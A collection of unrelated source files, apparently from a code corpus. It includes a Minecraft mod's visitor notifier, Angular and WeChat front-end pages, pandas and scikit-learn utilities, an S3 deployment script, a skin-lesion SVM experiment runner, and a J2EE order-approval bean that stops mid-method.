notifyList.add(owner);
}
}
for(ServerPlayer player : this.server.getPlayerList().getPlayers())
{
Set<String> visitors = BASE_VISITORS.computeIfAbsent(base, key -> new HashSet<String>());
String name = player.getGameProfile().getName();
boolean inside = base.isInside(player);
boolean contains = visitors.contains(name);
if(!inside && contains)
{
visitors.remove(name);
this.notifyOwners(base, notifyList, player, BaseAccess.LEAVE);
}
else if(inside && !contains)
{
visitors.add(name);
this.notifyOwners(base, notifyList, player, BaseAccess.ENTER);
}
}
}
}
private void notifyOwners(Property base, List<PropertyOwner> notify, ServerPlayer player, BaseAccess access)
{
String name = player.getGameProfile().getName();
if(!base.isOwner(name))
{
switch(access)
{
case ENTER:
this.server.sendMessage(new TextComponent(name + " has entered base with id " + base.getTitle()), null);;
break;
case LEAVE:
this.server.sendMessage(new TextComponent(name + " has left base with id " + base.getTitle()), null);
break;
}
for(PropertyOwner owner : notify)
{
ServerPlayer playerOwner = this.server.getPlayerList().getPlayerByName(owner.getName());
if(playerOwner != null)
{
playerOwner.sendMessage(this.getFormattedMessage(player, base, owner, access), Util.NIL_UUID);
}
}
}
}
private Component getFormattedMessage(ServerPlayer player, Property base, PropertyOwner owner, BaseAccess access)
{
String format = null;
switch(access)
{
case ENTER:
format = owner.getEnterMessage();
break;
case LEAVE:
format = owner.getExitMessage();
break;
}
if(format != null)
{
return new TranslatableComponent(format.replace("&name", "%1$s").replace("&base", "%2$s"), new Object[]{player.getDisplayName(), base.getDisplayName()});
}
switch(access)
{
case ENTER:
return new TranslatableComponent(KardExo.CONFIG.getPropertyDefaultEnterMessage(), new Object[]{player.getDisplayName(), base.getDisplayName()});
case LEAVE:
return new TranslatableComponent(KardExo.CONFIG.getPropertyDefaultExitMessage(), new Object[]{player.getDisplayName(), base.getDisplayName()});
}
return null;
}
public static void remove(Property base)
{
BASE_VISITORS.remove(base);
}
public static Set<String> get(Property base)
{
return BASE_VISITORS.get(base);
}
public static void reload()
{
BASE_VISITORS.clear();
}
}
|
<filename>src/app/dashboard/index/index.component.ts
import {Component} from '@angular/core';
import { indexService } from '../index/services/index.service';
import {Router} from '@angular/router';
@Component({
templateUrl: "app/dashboard/index/index.component.html",
styleUrls: ["app/dashboard/index/index.component.css"],
providers: [indexService],
})
export class dashboardIndexComponent {
employeeData: any[];
token: string;
constructor(private _indexService: indexService, private _router: Router){
this._indexService.getEmployeeData().subscribe(data => {
this.employeeData = data;
});
}
deleteEmployee(id): void {
this._indexService.deleteEmployee(id).subscribe(data => {
this.employeeData = this.employeeData.filter(function(employee){
return employee.id != id;
});
});
}
}
|
# -*- coding: utf-8 -*-
"""
@author: efourrier
Purpose : Create toolbox functions to use for the different pieces of code ot the package
"""
import warnings
from numpy.random import normal
from numpy.random import choice
import time
import pandas as pd
import numpy as np
def removena_numpy(array):
return array[~(np.isnan(array))]
def common_cols(df1,df2):
""" Return the intersection of commun columns name """
return list(set(df1.columns) & set(df2.columns))
def bootstrap_ci(x,n = 300 ,ci = 0.95):
"""
this is a function depending on numpy to compute bootstrap percentile
confidence intervalfor the mean of a numpy array
Arguments
---------
x : a numpy ndarray
n : the number of boostrap samples
ci : the percentage confidence (float) interval in ]0,1[
Return
-------
a tuple (ci_inf,ci_up)
"""
low_per = 100*(1 - ci)/2
high_per = 100*ci + low_per
x = removena_numpy(x)
if not len(x):
return (np.nan,np.nan)
bootstrap_samples = choice(a = x,size = (len(x),n),replace = True).mean(axis = 0)
return np.percentile(bootstrap_samples,[low_per,high_per])
def clock(func):
""" decorator to measure the duration of each test of the unittest suite,
this is extensible for any kind of functions it will just add a print """
def clocked(*args):
t0 = time.time()
result = func(*args)
elapsed = (time.time() - t0) * 1000 # in ms
print('elapsed : [{0:0.3f}ms]'.format(elapsed))
return result
return clocked
def create_test_df():
""" Creating a test pandas DataFrame for the unittest suite """
test_df = pd.DataFrame({'id' : [i for i in range(1,1001)],'member_id': [10*i for i in range(1,1001)]})
test_df['na_col'] = np.nan
test_df['id_na'] = test_df.id
test_df.loc[1:3,'id_na'] = np.nan
test_df['constant_col'] = 'constant'
test_df['constant_col_num'] = 0
test_df['character_factor'] = [choice(list('ABCDEFG')) for _ in range(1000)]
test_df['num_factor'] = [choice([1,2,3,4]) for _ in range(1000)]
test_df['nearzerovar_variable'] = 'most_common_value'
test_df.loc[0,'nearzerovar_variable'] = 'one_value'
test_df['binary_variable'] = [choice([0,1]) for _ in range(1000)]
test_df['character_variable'] = [str(i) for i in range(1000)]
test_df['duplicated_column'] = test_df.id
test_df['many_missing_70'] = [1]*300 + [np.nan] * 700
test_df['character_variable_fillna'] = ['A']*300 + ['B']*200 + ['C']*200 +[np.nan]*300
test_df['numeric_variable_fillna'] = [1]*400 + [3]*400 + [np.nan]*200
test_df['num_variable'] = 100
test_df['outlier'] = normal(size = 1000)
test_df.loc[[1,10,100],'outlier'] = [10,5,10]
return test_df
def get_test_df_complete():
""" get the full test dataset from Lending Club open source database,
the purpose of this fuction is to be used in a demo ipython notebook """
import requests
from zipfile import ZipFile
from io import StringIO
zip_to_download = "https://resources.lendingclub.com/LoanStats3b.csv.zip"
r = requests.get(zip_to_download)
zipfile = ZipFile(StringIO(r.content))
file_csv = zipfile.namelist()[0]
# we are using the c parser for speed
df = pd.read_csv(zipfile.open(file_csv), skiprows =[0], na_values = ['n/a','N/A',''],
parse_dates = ['issue_d','last_pymnt_d','next_pymnt_d','last_credit_pull_d'] )
zipfile.close()
df = df[:-2]
nb_row = float(len(df.index))
df['na_col'] = np.nan
df['constant_col'] = 'constant'
df['duplicated_column'] = df.id
df['many_missing_70'] = np.nan
df.loc[1:int(0.3*nb_row),'many_missing_70'] = 1
df['bad'] = 1
index_good = df['loan_status'].isin(['Fully Paid', 'Current','In Grace Period'])
df.loc[index_good,'bad'] = 0
return df
def psi(bench,target,group,print_df = True):
""" This function return the Population Stability Index, quantifying if the
distribution is stable between two states.
This statistic make sense and works is only working for numeric variables
for bench and target.
Params:
- bench is a numpy array with the reference variable.
- target is a numpy array of the new variable.
- group is the number of group you want consider.
"""
labels_q = np.percentile(bench,[(100.0/group)*i for i in range(group + 1)],interpolation = "nearest")
# This is the right approach when you have not a lot of unique value
ben_pct = (pd.cut(bench,bins = np.unique(labels_q),include_lowest = True).value_counts())/len(bench)
target_pct = (pd.cut(target,bins = np.unique(labels_q),include_lowest = True).value_counts())/len(target)
target_pct = target_pct.sort_index()# sort the index
ben_pct = ben_pct.sort_index() # sort the index
psi = sum((target_pct - ben_pct)*np.log(target_pct/ben_pct))
# Print results for better understanding
if print_df:
results = pd.DataFrame({'ben_pct': ben_pct.values,
'target_pct': target_pct.values},
index = ben_pct.index)
return {'data':results,'statistic': psi}
return psi
def info(object, spacing=10, collapse=1):
"""Print methods and doc strings.
Takes module, class, list, dictionary, or string."""
methodList = [method for method in dir(object) if callable(getattr(object, method))]
processFunc = collapse and (lambda s: " ".join(s.split())) or (lambda s: s)
print("\n".join(["%s %s" %
(method.ljust(spacing),
processFunc(str(getattr(object, method).__doc__)))
for method in methodList]))
def deprecated(func):
'''This is a decorator which can be used to mark functions
as deprecated. It will result in a warning being emitted
when the function is used.'''
def new_func(*args, **kwargs):
warnings.warn("Call to deprecated function {}.".format(func.__name__),
category=DeprecationWarning)
return func(*args, **kwargs)
new_func.__name__ = func.__name__
new_func.__doc__ = func.__doc__
new_func.__dict__.update(func.__dict__)
return new_func
|
export function PageHeader(props: any) {
return (
<div></div>
)
} |
import numpy as np
class CostComputation:
def __init__(self, m, lambdaRate):
self.m = m
self.lambdaRate = lambdaRate
def compute_distances(self, theta, y):
distances = np.abs(np.subtract(theta, y))
return distances
def regularize_cost(self, cost, theta):
if self.lambdaRate > 0.0:
regularization_term = (self.lambdaRate / (2 * self.m)) * np.sum(np.power(theta, 2))
regularized_cost = cost + regularization_term
return regularized_cost
else:
return cost
def compute_cost(self, theta, classIndex):
y = self.get_labeled_set(classIndex)
distances = self.compute_distances(theta, y)
costMatrix = np.power(distances, 2)
cost = (1 / (2 * float(self.m))) * np.sum(costMatrix)
if (self.lambdaRate > 0.0):
cost = self.regularize_cost(cost, theta)
return cost |
#!/bin/bash
# fail the build on any failed command
set -e
usage() {
echo "usage: $0 [-e <path/to/file>] [-v <version string>] [-p] [-b <path/to/build>]" 1>&2
exit 1
}
# default build directory
BUILD="dist/"
# default version
REACT_APP_VERSION="latest"
# validates versioning e.g. v0.1.0
validate_version() {
# regex matching version numbers
rx='^v([0-9]+\.){0,2}(\*|[0-9]+)$'
if [[ $1 =~ $rx ]]; then
echo "info: validated version $1"
REACT_APP_VERSION=$1
else
echo "error: unable to validate version '$1'" 1>&2
echo "format is '${rx}'"
exit 1
fi
}
# validates that build directory exists
validate_build() {
if [ -d $1 ]; then
echo "info: validated build directory $1"
BUILD=$1
else
echo "error: build directory '$1' does not exist" 1>&2
exit 1
fi
}
# validates that environment file exists
validate_env() {
if [ -f $1 ]; then
echo "info: validated environment file $1"
source ${1}
else
echo "error: environment file '$1' does not exist" 1>&2
exit 1
fi
}
# parse command line arguments
while getopts "e:v:b:" opt; do
case ${opt} in
e)
e=${OPTARG}
validate_env ${e}
;;
b)
b=${OPTARG}
validate_build ${b}
;;
v)
v=${OPTARG}
validate_version ${v}
;;
\?)
echo "error: invalid option '-$OPTARG'" 1>&2
exit 1
;;
esac
done
# ensure the correct variables are defined
if \
[ -z "${REACT_APP_HOST}" ] || \
[ -z "${REACT_APP_GRAASP_DEVELOPER_ID}" ] || \
[ -z "${REACT_APP_GRAASP_APP_ID}" ]; then
echo "error: environment variables REACT_APP_GRAASP_APP_ID, REACT_APP_GRAASP_DEVELOPER_ID and/or REACT_APP_HOST are not defined" 1>&2
echo "error: you can specify them through a .env file in the app root folder" 1>&2
echo "error: or through another file specified with the -e flag" 1>&2
exit 1
fi
# ensure the correct aws credentials are defined
if \
[ -z "${BUCKET}" ] || \
[ -z "${AWS_ACCESS_KEY_ID}" ] || \
[ -z "${AWS_SECRET_ACCESS_KEY}" ]; then
echo "error: environment variables BUCKET, AWS_ACCESS_KEY_ID and/or AWS_SECRET_ACCESS_KEY are not defined" 1>&2
echo "error: make sure you setup your credentials file correctly using the scripts/setup.sh script" 1>&2
echo "error: and contact your favourite Graasp engineer if you keep running into trouble" 1>&2
exit 1
fi
export AWS_ACCESS_KEY_ID=${AWS_ACCESS_KEY_ID}
export AWS_SECRET_ACCESS_KEY=${AWS_SECRET_ACCESS_KEY}
echo "info: publishing app ${REACT_APP_GRAASP_APP_ID} version ${REACT_APP_VERSION}"
APP_DIR=${BUCKET}/${REACT_APP_GRAASP_DEVELOPER_ID}/${REACT_APP_GRAASP_APP_ID}/${REACT_APP_VERSION}/
# make sure you do not use the word PATH as a variable because it overrides the PATH environment variable
APP_PATH=${REACT_APP_GRAASP_DEVELOPER_ID}/${REACT_APP_GRAASP_APP_ID}/${REACT_APP_VERSION}
# sync s3 bucket
aws s3 sync ${BUILD} s3://${APP_DIR} --delete
# todo: allow cache invalidations per app once it is supported by cloudfront
# see: https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_aws-services-that-work-with-iam.html
# ensure the correct distribution variables are defined
#if \
# [ -z "${DISTRIBUTION}" ]; then
# echo "error: environment variable DISTRIBUTION is not defined" 1>&2
# echo "error: contact your favourite Graasp engineer if you keep running into trouble" 1>&2
# exit 1
#fi
# invalidate cloudfront distribution
# aws cloudfront create-invalidation --distribution-id ${DISTRIBUTION} --paths /${APP_PATH}/*
|
import {
maintenanceReminder,
logOutRequest
} from '../../lib/api';
const App = getApp();
Page({
/**
* 页面的初始数据
*/
data: {
errorStatus: null,
maintainMileage: "",
distance: "",
},
/**
* 生命周期函数--监听页面加载
*/
onLoad: function (options) {
},
/**
* 更新保养提醒信息
*/
updateMaintenance(){
App.showLoading("数据正在更新");
maintenanceReminder().then(res => {
if(res){
// maintainMileage 保养里程 distance总里程
let { maintainMileage, distance } = res;
this.setData({
maintainMileage,
distance,
errorStatus: false
}, () => {
const timer = setTimeout(() => {
wx.hideLoading();
clearTimeout(timer);
}, 300);
})
}
}, () => {
this.setData({
errorStatus: true
})
})
},
/**
* 修改密码
*/
goUpdatePasswd() {
wx.navigateTo({
url: '/pages/password/password',
})
},
/**
* 退出登录
*/
loginOut(){
const userToken = wx.getStorageSync('userToken');
if(userToken){
App.showLoading("请稍后");
logOutRequest({token: userToken}).then(() => {
wx.hideLoading();
App.showToast("退出成功", 500);
getApp().globalData.scale = 3;
const timer = setTimeout(() => {
clearTimeout(timer);
wx.reLaunch({
url: '/pages/index/index'
})
}, 500);
})
}
},
/**
* 生命周期函数--监听页面显示
*/
onShow: function () {
this.updateMaintenance();
},
/**
* 生命周期函数--监听页面隐藏
*/
onHide: function () {
},
/**
* 生命周期函数--监听页面卸载
*/
onUnload: function () {
}
}) |
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
# Load the data
data = pd.read_csv("data.csv")
X = data[['Market Index','Interest Rates']].values
y = data['Price'].values
# Split the data into training and test sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
# Train the model
regressor = LinearRegression()
regressor.fit(X_train, y_train)
# Predict the stock price
y_pred = regressor.predict(X_test) |
def remove_duplicates(strs):
new_strs = []
for i in strs:
if i not in new_strs:
new_strs.append(i)
return new_strs
# Driver Code
strs = ["Hello", "World", "Hello", "Goodbye", "Goodbye", "Welcome"]
print(remove_duplicates(strs)) |
#!/bin/bash
# ========== Experiment Seq. Idx. 755 / 37.5.1 / N. 48/6/1 - _S=37.5.1 D1_N=48 a=-1 b=-1 c=-1 d=-1 e=-1 f=1 D3_N=6 g=1 h=1 i=-1 D4_N=1 j=1 ==========
set -u
# Prints header
echo -e '\n\n========== Experiment Seq. Idx. 755 / 37.5.1 / N. 48/6/1 - _S=37.5.1 D1_N=48 a=-1 b=-1 c=-1 d=-1 e=-1 f=1 D3_N=6 g=1 h=1 i=-1 D4_N=1 j=1 ==========\n\n'
if [[ "Yes" == "No" ]]; then
echo 'FATAL: This treatment did not include an SVM layer.'>&2
echo ' Something very wrong happened!'>&2
exit 161
fi
# Prepares all environment variables
JBHI_DIR="$HOME/jbhi-special-issue"
DATASET_DIR="$JBHI_DIR/data/challenge-val-seg.305.tfr"
MODEL_DIR="$JBHI_DIR/models/deep.48"
SVM_DIR="$JBHI_DIR/svm-models"
SVM_PREFIX="$SVM_DIR/deep.48.layer.6.svm"
SVM_PATH="$SVM_PREFIX.pkl"
FEATURES_DIR="$JBHI_DIR/features"
TEST_FEATURES_PREFIX="$FEATURES_DIR/deep.48.layer.6.test.1.index.1999.test"
TEST_FEATURES_PATH="$TEST_FEATURES_PREFIX.feats.pkl"
RESULTS_DIR="$JBHI_DIR/results"
RESULTS_PREFIX="$RESULTS_DIR/deep.48.layer.6.test.1.index.1999.svm"
RESULTS_PATH="$RESULTS_PREFIX.results.txt"
# ...variables expected by jbhi-checks.include.sh and jbhi-footer.include.sh
SOURCES_GIT_DIR="$JBHI_DIR/jbhi-special-issue"
LIST_OF_INPUTS="$DATASET_DIR/finish.txt:$MODEL_DIR/finish.txt:$SVM_PREFIX.finish.txt"
START_PATH="$RESULTS_PREFIX.start.txt"
FINISH_PATH="$RESULTS_PREFIX.finish.txt"
LOCK_PATH="$RESULTS_PREFIX.running.lock"
LAST_OUTPUT="$RESULTS_PATH"
# ...creates mid-way checkpoint after the expensive test features extraction
SEMIFINISH_PATH="$TEST_FEATURES_PREFIX.finish.txt"
# EXPERIMENT_STATUS=1
# STARTED_BEFORE=No
mkdir -p "$FEATURES_DIR"
mkdir -p "$RESULTS_DIR"
#
# Assumes that the following environment variables where initialized
# SOURCES_GIT_DIR="$JBHI_DIR/jbhi-special-issue"
# LIST_OF_INPUTS="$DATASET_DIR/finish.txt:$MODELS_DIR/finish.txt:"
# START_PATH="$OUTPUT_DIR/start.txt"
# FINISH_PATH="$OUTPUT_DIR/finish.txt"
# LOCK_PATH="$OUTPUT_DIR/running.lock"
# LAST_OUTPUT="$MODEL_DIR/[[[:D1_MAX_NUMBER_OF_STEPS:]]].meta"
EXPERIMENT_STATUS=1
STARTED_BEFORE=No
# Checks if code is stable, otherwise alerts scheduler
pushd "$SOURCES_GIT_DIR" >/dev/null
GIT_STATUS=$(git status --porcelain)
GIT_COMMIT=$(git log | head -n 1)
popd >/dev/null
if [ "$GIT_STATUS" != "" ]; then
echo 'FATAL: there are uncommitted changes in your git sources file' >&2
echo ' for reproducibility, experiments only run on committed changes' >&2
echo >&2
echo ' Git status returned:'>&2
echo "$GIT_STATUS" >&2
exit 162
fi
# The experiment is already finished - exits with special code so scheduler won't retry
if [[ "$FINISH_PATH" != "-" ]]; then
if [[ -e "$FINISH_PATH" ]]; then
echo 'INFO: this experiment has already finished' >&2
exit 163
fi
fi
# The experiment is not ready to run due to dependencies - alerts scheduler
if [[ "$LIST_OF_INPUTS" != "" ]]; then
IFS=':' tokens_of_input=( $LIST_OF_INPUTS )
input_missing=No
for input_to_check in ${tokens_of_input[*]}; do
if [[ ! -e "$input_to_check" ]]; then
echo "ERROR: input $input_to_check missing for this experiment" >&2
input_missing=Yes
fi
done
if [[ "$input_missing" != No ]]; then
exit 164
fi
fi
# Sets trap to return error code if script is interrupted before successful finish
LOCK_SUCCESS=No
FINISH_STATUS=161
function finish_trap {
if [[ "$LOCK_SUCCESS" == "Yes" ]]; then
rmdir "$LOCK_PATH" &> /dev/null
fi
if [[ "$FINISH_STATUS" == "165" ]]; then
echo 'WARNING: experiment discontinued because other process holds its lock' >&2
else
if [[ "$FINISH_STATUS" == "160" ]]; then
echo 'INFO: experiment finished successfully' >&2
else
[[ "$FINISH_PATH" != "-" ]] && rm -f "$FINISH_PATH"
echo 'ERROR: an error occurred while executing the experiment' >&2
fi
fi
exit "$FINISH_STATUS"
}
trap finish_trap EXIT
# While running, locks experiment so other parallel threads won't attempt to run it too
if mkdir "$LOCK_PATH" --mode=u=rwx,g=rx,o=rx &>/dev/null; then
LOCK_SUCCESS=Yes
else
echo 'WARNING: this experiment is already being executed elsewhere' >&2
FINISH_STATUS="165"
exit
fi
# If the experiment was started before, do any cleanup necessary
if [[ "$START_PATH" != "-" ]]; then
if [[ -e "$START_PATH" ]]; then
echo 'WARNING: this experiment is being restarted' >&2
STARTED_BEFORE=Yes
fi
#...marks start
date -u >> "$START_PATH"
echo GIT "$GIT_COMMIT" >> "$START_PATH"
fi
#...gets closest checkpoint file
MODEL_CHECKPOINT=$(ls "$MODEL_DIR/"model.ckpt-*.index | \
sed 's/.*ckpt-\([0-9]*\)\..*/\1/' | \
sort -n | \
awk -v c=1 -v t=30000 \
'NR==1{d=$c-t;d=d<0?-d:d;v=$c;next}{m=$c-t;m=m<0?-m:m}m<d{d=m;v=$c}END{print v}')
MODEL_PATH="$MODEL_DIR/model.ckpt-$MODEL_CHECKPOINT"
echo "$MODEL_PATH" >> "$START_PATH"
if [[ ! -f "$SEMIFINISH_PATH" ]]; then
#...performs preliminary feature extraction
echo Extracting SVM test features with "$MODEL_PATH"
python \
"$SOURCES_GIT_DIR/predict_image_classifier.py" \
--model_name="resnet_v2_101_seg" \
--checkpoint_path="$MODEL_PATH" \
--dataset_name=skin_lesions \
--task_name=label \
--dataset_split_name=test \
--preprocessing_name=dermatologic \
--aggressive_augmentation="False" \
--add_rotations="False" \
--minimum_area_to_crop="0.05" \
--normalize_per_image="0" \
--batch_size=1 \
--id_field_name=id \
--pool_features=avg \
--extract_features \
--output_format=pickle \
--add_scores_to_features=none \
--eval_replicas="1" \
--output_file="$TEST_FEATURES_PATH" \
--dataset_dir="$DATASET_DIR"
# Tip: leave last the arguments that make the command fail if they're absent,
# so if there's a typo or forgotten \ the entire thing fails
EXPERIMENT_STATUS="$?"
if [[ "$EXPERIMENT_STATUS" != "0" || ! -e "$TEST_FEATURES_PATH" ]]; then
exit
fi
date -u >> "$SEMIFINISH_PATH"
echo GIT "$GIT_COMMIT" >> "$SEMIFINISH_PATH"
else
echo Reloading features from "$TEST_FEATURES_PATH"
fi
#...performs prediction with SVM model
python \
"$SOURCES_GIT_DIR/predict_svm_layer.py" \
--output_file "$RESULTS_PATH" \
--input_test "$TEST_FEATURES_PATH" \
--input_model "$SVM_PATH"
# Tip: leave last the arguments that make the command fail if they're absent,
# so if there's a typo or forgotten \ the entire thing fails
EXPERIMENT_STATUS="$?"
#
#...starts training
if [[ "$EXPERIMENT_STATUS" == "0" ]]; then
if [[ "$LAST_OUTPUT" == "" || -e "$LAST_OUTPUT" ]]; then
if [[ "$FINISH_PATH" != "-" ]]; then
date -u >> "$FINISH_PATH"
echo GIT "$GIT_COMMIT" >> "$FINISH_PATH"
fi
FINISH_STATUS="160"
fi
fi
|
import unittest
from you_get.common import any_download
class WeishiTest(unittest.TestCase):
def test_download(self):
any_download('https://www.bilibili.com/video/BV14v411W7F8?p=1&share_medium=iphone&share_plat=ios&share_session_id=9E81771B-C798-47AB-A238-29AED9C5CF3F&share_source=WEIXIN&share_tag=s_i×tamp=1630235462&unique_k=5eOjdD', merge=True, info_only=False, output_dir='.')
|
/*
* Copyright 2002 Sun Microsystems, Inc. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* - Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* - Redistribution in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* Neither the name of Sun Microsystems, Inc. or the names of
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* This software is provided "AS IS," without a warranty of any
* kind. ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND
* WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT, ARE HEREBY
* EXCLUDED. SUN AND ITS LICENSORS SHALL NOT BE LIABLE FOR ANY DAMAGES
* SUFFERED BY LICENSEE AS A RESULT OF USING, MODIFYING OR
* DISTRIBUTING THE SOFTWARE OR ITS DERIVATIVES. IN NO EVENT WILL SUN
* OR ITS LICENSORS BE LIABLE FOR ANY LOST REVENUE, PROFIT OR DATA, OR
* FOR DIRECT, INDIRECT, SPECIAL, CONSEQUENTIAL, INCIDENTAL OR
* PUNITIVE DAMAGES, HOWEVER CAUSED AND REGARDLESS OF THE THEORY OF
* LIABILITY, ARISING OUT OF THE USE OF OR INABILITY TO USE SOFTWARE,
* EVEN IF SUN HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
*
* You acknowledge that Software is not designed, licensed or intended
* for use in the design, construction, operation or maintenance of
* any nuclear facility.
*/
package com.sun.j2ee.blueprints.opc.ejb;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Date;
import java.util.Iterator;
import java.net.URL;
import javax.ejb.EJBException;
import javax.ejb.CreateException;
import javax.ejb.FinderException;
import javax.ejb.MessageDrivenBean;
import javax.ejb.MessageDrivenContext;
import javax.naming.Context;
import javax.naming.NamingException;
import javax.jms.*;
import com.sun.j2ee.blueprints.xmldocuments.OrderApproval;
import com.sun.j2ee.blueprints.xmldocuments.ChangedOrder;
import com.sun.j2ee.blueprints.xmldocuments.XMLDocumentException;
import com.sun.j2ee.blueprints.xmldocuments.tpa.TPASupplierOrderXDE;
import com.sun.j2ee.blueprints.processmanager.ejb.ProcessManagerLocalHome;
import com.sun.j2ee.blueprints.processmanager.ejb.ProcessManagerLocal;
import com.sun.j2ee.blueprints.processmanager.ejb.OrderStatusNames;
import com.sun.j2ee.blueprints.contactinfo.ejb.ContactInfoLocal;
import com.sun.j2ee.blueprints.contactinfo.ejb.ContactInfoLocalHome;
import com.sun.j2ee.blueprints.address.ejb.AddressLocal;
import com.sun.j2ee.blueprints.address.ejb.AddressLocalHome;
import com.sun.j2ee.blueprints.lineitem.ejb.LineItemLocal;
import com.sun.j2ee.blueprints.lineitem.ejb.LineItemLocalHome;
import com.sun.j2ee.blueprints.lineitem.ejb.LineItem;
import com.sun.j2ee.blueprints.purchaseorder.ejb.PurchaseOrderLocalHome;
import com.sun.j2ee.blueprints.purchaseorder.ejb.PurchaseOrderLocal;
import com.sun.j2ee.blueprints.servicelocator.ServiceLocatorException;
import com.sun.j2ee.blueprints.servicelocator.ejb.ServiceLocator;
import com.sun.j2ee.blueprints.opc.transitions.*;
import com.sun.j2ee.blueprints.processmanager.transitions.*;
/**
* OrderApprovalMDB gets a JMS message containing a list of
* orders that has been updated. It updates the POEJB state
* based on the status of the orders. For all approved orders
* a supplier purchase order is built and sent to a supplier,
* and a batch of order approval status notices to the customer
* relations department to handle sending an email can to customers.
*/
public class OrderApprovalMDB implements MessageDrivenBean, MessageListener {
private Context context;
private MessageDrivenContext mdc;
private TransitionDelegate transitionDelegate;
private ProcessManagerLocal processManager;
private TPASupplierOrderXDE supplierOrderXDE;
private PurchaseOrderLocalHome poHome;
private URL entityCatalogURL;
private boolean validateXmlOrderApproval;
/** Inner class used as to hold the return
* values for the doWork
**/
private class WorkResult {
ArrayList supplierPoList;
String xmlMailOrderApprovals;
WorkResult(String xmlMailOrderApprovals, ArrayList supplierPoList) {
this.xmlMailOrderApprovals = xmlMailOrderApprovals;
this.supplierPoList = supplierPoList;
}
}
public OrderApprovalMDB() {
}
public void ejbCreate() {
try {
ServiceLocator serviceLocator = new ServiceLocator();
poHome = (PurchaseOrderLocalHome)serviceLocator.getLocalHome(JNDINames.PURCHASE_ORDER_EJB);
ProcessManagerLocalHome pmlh = (ProcessManagerLocalHome)serviceLocator.getLocalHome(JNDINames.PROCESS_MANAGER_EJB);
processManager = pmlh.create();
entityCatalogURL = serviceLocator.getUrl(JNDINames.XML_ENTITY_CATALOG_URL);
validateXmlOrderApproval = serviceLocator.getBoolean(JNDINames.XML_VALIDATION_ORDER_APPROVAL);
String tdClassName = serviceLocator.getString(JNDINames.TRANSITION_DELEGATE_ORDER_APPROVAL);
TransitionDelegateFactory tdf = new TransitionDelegateFactory();
transitionDelegate = tdf.getTransitionDelegate(tdClassName);
transitionDelegate.setup();
supplierOrderXDE = new TPASupplierOrderXDE(entityCatalogURL,
serviceLocator.getBoolean(JNDINames.XML_XSD_VALIDATION));
} catch (TransitionException te) {
throw new EJBException(te);
} catch (ServiceLocatorException se) {
throw new EJBException(se);
} catch (CreateException ce) {
throw new EJBException(ce);
} catch (XMLDocumentException xde) {
throw new EJBException(xde);
}
}
/**
* Process a list of order status updates for customer orders
*
* @param a JMS message containing an OrderApproval that
* contains a list of orders and the status updates,
* such as APPROVED or DENIED.
*/
public void onMessage(Message recvMsg) {
TextMessage recdTM = null;
String recdText = null;
WorkResult result = null;
try {
recdTM = (TextMessage)recvMsg;
recdText = recdTM.getText();
result = doWork(recdText);
doTransition(result.supplierPoList, result.xmlMailOrderApprovals);
} catch(TransitionException te) {
throw new EJBException(te);
} catch(XMLDocumentException xde) {
throw new EJBException(xde);
}catch (JMSException je) {
throw new EJBException(je);
} catch(FinderException ce) {
throw new EJBException(ce);
}
}
public void setMessageDrivenContext(MessageDrivenContext mdc) {
this.mdc = mdc;
}
public void ejbRemove() {
}
/**
* Process the list of order approvals and update database. Send a
* PurchaseOrder to a supplier for each approved order. Also generate
* a list of approved or denied orders.
*
* @return a list of valid order approvals/denys to be sent
* to customer relations. Or return null, if list empty
* or no valid orders AND also the list of Purchase
* Orders to send to supplier to fullfill the order
*/
private WorkResult doWork(String xmlMessage) throws XMLDocumentException, FinderException {
ArrayList supplierPoList = new ArrayList();
PurchaseOrderLocal po = null;
OrderApproval approval = null;
approval = OrderApproval.fromXML(xmlMessage, entityCatalogURL, validateXmlOrderApproval);
//generate list of valid orders to return
OrderApproval oaMailList = new OrderApproval();
String xmlMailOrderApprovals = null;
Collection coll = approval.getOrdersList();
Iterator it = coll.iterator();
while(it!= null && it.hasNext()) {
ChangedOrder co = (ChangedOrder) it.next();
// only PENDING orders can be updated
//if order alreay APPROVED or DENIED or COMPLETED, then order
//already processed so dont process again
String curStatus = processManager.getStatus(co.getOrderId());
if(!curStatus.equals(OrderStatusNames.PENDING)) {
continue;
}
//generate list of valid orders to return
//list contains orders to notify the customer of
//order status changes. List is sent to customer
//relations for emailing.
oaMailList.addOrder(co);
//update process manager
//for this purchase order workflow
processManager.updateStatus(co.getOrderId(), co.getOrderStatus());
//for all approved orders, send a PO to supplier
if(co.getOrderStatus().equals(OrderStatusNames.APPROVED)) {
po = poHome.findByPrimaryKey(co.getOrderId());
String xmlPO = getXmlPO(po, supplierOrderXDE);
supplierPoList.add(xmlPO);
}
}//end while
xmlMailOrderApprovals = oaMailList.toXML();
return new WorkResult(xmlMailOrderApprovals, supplierPoList);
}
/**
* Send Purchase Orders to supplier to fulfill a customer order and
* also send a list of approvals/denials to customer service to send emails
*
* @param supplierPoList is the list of Purchase Orders to send to supplier
* @param xmlMailOrderApprovals is the list of approvals/denials to send to customers
*/
private void doTransition(Collection supplierPoList, String xmlMailOrderApprovals) throws TransitionException {
TransitionInfo info = new TransitionInfo(xmlMailOrderApprovals, supplierPoList);
transitionDelegate.doTransition(info);
}
/**
* Given a PO, its gets all info and builds the Supplier PO
* @param the po
* @returns the Supplier PO in xml format
*/
private String getXmlPO(PurchaseOrderLocal po, TPASupplierOrderXDE supplierOrderXDE) throws XMLDocumentException{
supplierOrderXDE.newDocument();
supplierOrderXDE.setOrderId(po.getPoId());
Date tmpDate = new Date(po.getPoDate());
supplierOrderXDE.setOrderDate(tmpDate);
ContactInfoLocal cinfo = po.getContactInfo();
AddressLocal addr = cinfo.getAddress();
supplierOrderXDE.setShippingAddress(cinfo.getGivenName(), cinfo.getFamilyName(),
addr.getStreetName1(), addr.getCity(),
